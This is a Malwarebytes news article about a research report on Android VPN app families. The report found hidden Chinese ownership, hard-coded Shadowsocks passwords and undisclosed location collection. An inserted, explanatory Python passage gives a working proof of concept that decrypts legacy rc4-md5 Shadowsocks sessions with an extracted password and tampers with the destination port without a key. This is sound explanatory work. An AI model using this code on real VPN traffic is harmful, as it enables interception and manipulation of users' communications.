Popular Android VPN apps found to have security flaws and China links

A recent report has revealed that many VPNs might allow others to sniff your data—and they’re not being honest about who’s behind them.

Malwarebytes

People use VPNs for different security and privacy reasons, to access content anonymously, or to bypass content controls and age verification by pretending to be in different places. But not all VPNs are created equal. A recent report has revealed that many of them might allow others to sniff your data—and they’re not being honest about who’s behind them.

The report, called Hidden Links: Analyzing Secret Families of VPN Apps, comes from researchers at the University of Toronto's Citizen Lab and Arizona State University. It warns that several Android VPN apps distributed through the Google Play Store have security flaws that allow others to snoop on their traffic. The providers are also deceiving users about who owns them, the report warns:

“The providers appear to be owned and operated by a Chinese company and have gone to great lengths to hide this fact from their 700+ million combined user bases.”

The researchers looked at the 100 most-downloaded VPNs and took the half of them that were not US-based. Then they scanned websites, business filings, and the VPN apps’ source code to try and find links between them. Using a combination of data points found in these resources, they found common software libraries, technical infrastructure, and business details that allowed them to group the VPN apps into three families.

Family A contained eight VPN applications linked to the providers Innovative Connecting, Autumn Breeze, and Lemon Clove. These apps all shared some common security flaws, including a hard-coded key used to create the password for Shadowsocks, a protocol designed to circumvent the Chinese government's internet censorship system. Because the password never changes and can be pulled out of the app, anyone who extracts it and can observe traffic between the client and the VPN server can decrypt that traffic.

From the report:

“On many of the VPNs we analyzed, a network eavesdropper between the VPN client and VPN server can use the hard-coded Shadowsocks password to decrypt all communications for all clients using the apps.”

Just as worrying is the undisclosed collection of user location data by these apps, even though the providers' privacy policies claim that they don't do this. The apps request the ZIP code associated with the user's public IP address from ip-api.com and upload it to a database, the researchers said.

The Tech Transparency Project has previously connected the three providers responsible for these apps with the Chinese cybersecurity firm Qihoo 360, which the US has sanctioned for its connections to the People's Liberation Army.

Family B consisted of six providers, which between them are responsible for apps including Global VPN, XY VPN, and Super Z VPN, all of which use the same VPN servers. They had hard-coded passwords for Shadowsocks, too. In general, the researchers warn against relying on Shadowsocks-based apps for anonymity: it was designed for getting around China's censorship system, not for keeping users anonymous, they said:

“It was counterintuitive to find deprecated ciphers and hard-coded passwords in these apps, given that they are security-sensitive apps and many of their providers are owned by Qihoo 360, a major Chinese cybersecurity firm.”

Family C's two providers were responsible for VPNs such as Fast Potato VPN and X-VPN, which also had security issues. Like the other families, it was susceptible to further attacks, including what's known as a blind in/on-path attack: an attacker on the same network, or otherwise positioned on the path between the app and the VPN server, can inject into or manipulate the app's traffic even without being able to read it.
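To make concrete what a hard-coded Shadowsocks password (Families A and B above), a deprecated cipher (the report's quote) and the on-path tampering mentioned for Family C actually buy an attacker, here is an added example that is not code from the report, the apps, or Malwarebytes. It models the legacy Shadowsocks rc4-md5 stream format (IV sent in the clear, session key = MD5(EVP_BytesToKey(password) || IV), no integrity check) and plays three roles: a client encrypting a connection request, an eavesdropper who has only the password extracted from the APK, and an on-path attacker who rewrites the destination port without any key. The password, hostnames, IVs and payloads are all constructed for the example.

```python
import hashlib
import ipaddress
import os
import struct
from typing import List, Optional, Tuple

# Stand-in for a password pulled out of a decompiled APK. This value is constructed
# for the example; it is not one of the passwords the report found.
HARDCODED_PASSWORD = b"example-hardcoded-password"


def evp_bytes_to_key(password: bytes, key_len: int) -> bytes:
    """Legacy Shadowsocks key derivation: OpenSSL EVP_BytesToKey with MD5 and no salt.
    Deterministic, so one password always yields the same key for every client."""
    derived, prev = b"", b""
    while len(derived) < key_len:
        prev = hashlib.md5(prev + password).digest()
        derived += prev
    return derived[:key_len]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (a deprecated stream cipher; one call both encrypts and decrypts)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def ss_rc4_md5_encrypt(password: bytes, dst_host: bytes, dst_port: int,
                       payload: bytes, iv: Optional[bytes] = None) -> bytes:
    """Client side of a Shadowsocks rc4-md5 TCP stream: IV || RC4(md5(key||IV), header||payload).
    The header is ATYP 0x03 (domain name), one length byte, the name, and a big-endian port."""
    key = evp_bytes_to_key(password, 16)
    iv = os.urandom(16) if iv is None else iv
    header = bytes([0x03, len(dst_host)]) + dst_host + struct.pack(">H", dst_port)
    return iv + rc4(hashlib.md5(key + iv).digest(), header + payload)


def ss_rc4_md5_decrypt(password: bytes, stream: bytes) -> Tuple[str, int, bytes]:
    """Eavesdropper side: the IV travels in the clear, so the password alone recovers
    the session key. Returns (destination host, port, payload bytes)."""
    key = evp_bytes_to_key(password, 16)
    iv, body = stream[:16], stream[16:]
    pt = rc4(hashlib.md5(key + iv).digest(), body)
    atyp = pt[0]
    if atyp == 0x01:                                   # IPv4
        host, off = str(ipaddress.IPv4Address(pt[1:5])), 5
    elif atyp == 0x03:                                 # domain name
        host, off = pt[2:2 + pt[1]].decode("ascii"), 2 + pt[1]
    elif atyp == 0x04:                                 # IPv6
        host, off = str(ipaddress.IPv6Address(pt[1:17])), 17
    else:
        raise ValueError("unknown ATYP %#x" % atyp)
    (port,) = struct.unpack(">H", pt[off:off + 2])
    return host, port, pt[off + 2:]


def tamper_port(stream: bytes, host_len: int, old_port: int, new_port: int) -> bytes:
    """On-path tampering with no key: the stream cipher has no integrity check, so XORing
    the ciphertext bytes that cover the port field with old ^ new rewrites the destination
    port. Only the header layout and a guess at the original port are needed. This shows
    generic stream-cipher malleability, not the specific attack described in the report."""
    off = 16 + 2 + host_len                            # IV, ATYP, length byte, hostname
    mask = struct.pack(">H", old_port ^ new_port)
    out = bytearray(stream)
    out[off] ^= mask[0]
    out[off + 1] ^= mask[1]
    return bytes(out)


def eavesdrop_demo() -> List[Tuple[str, int, bytes]]:
    """Two different clients (constructed traffic, fixed IVs for reproducibility) talk to
    the same VPN server; the single extracted password decrypts both sessions."""
    sessions = [
        ss_rc4_md5_encrypt(HARDCODED_PASSWORD, b"example.com", 443,
                           b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n", iv=bytes(range(16))),
        ss_rc4_md5_encrypt(HARDCODED_PASSWORD, b"mail.example.net", 993,
                           b"a1 LOGIN alice hunter2\r\n", iv=bytes(range(16, 32))),
    ]
    return [ss_rc4_md5_decrypt(HARDCODED_PASSWORD, s) for s in sessions]


if __name__ == "__main__":
    for host, port, data in eavesdrop_demo():
        print(f"{host}:{port} -> {data!r}")
    stream = ss_rc4_md5_encrypt(HARDCODED_PASSWORD, b"example.com", 443, b"x", iv=bytes(16))
    redirected = tamper_port(stream, len(b"example.com"), 443, 8080)
    print("after on-path tampering:", ss_rc4_md5_decrypt(HARDCODED_PASSWORD, redirected)[:2])
```

The point to take from the example is that Shadowsocks has no key exchange: the password is the only secret, and every session key is derived from it plus data sent in the clear. That is still true of the newer AEAD cipher modes (where a per-session subkey is derived from the same password and a salt that is transmitted unencrypted), so moving a hard-coded password to a modern cipher would stop the tampering shown in tamper_port but not the passive decryption.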

Why are these apps in the Play Store?

Why might companies seek to operate multiple VPNs and then hide the fact? The researchers muse that they might be trying to avoid reputational damage if something happens to one VPN. They share code because it’s simply more cost-effective to do so, the report added.

The takeaway here is that plenty of VPNs are not what they seem. That's worrying, because whoever operates the servers the apps connect to terminates the tunnel and can see the traffic in the clear, and with hard-coded passwords so can anyone who extracts them from the apps and sits between the client and the server. So why doesn't Google stop it?

One of the big problems is that the relationships between the different app providers are time-intensive to figure out. That makes the checks hard for app store operators to automate at scale, the researchers point out. On the other hand, Google made $28.19bn in net profit in Q2 2025 alone, so maybe it could find some spare change down the back of the couch and put some manual investigators on it.

“Google is potentially exposing its brand to reputational damage by hosting and profiting from deceptive and insecure apps like the ones we investigated.”

It’s hard to know which providers to trust online. We suggest you research any security product carefully, and go for a trusted company with a solid reputation. Malwarebytes offers a VPN of our own here.
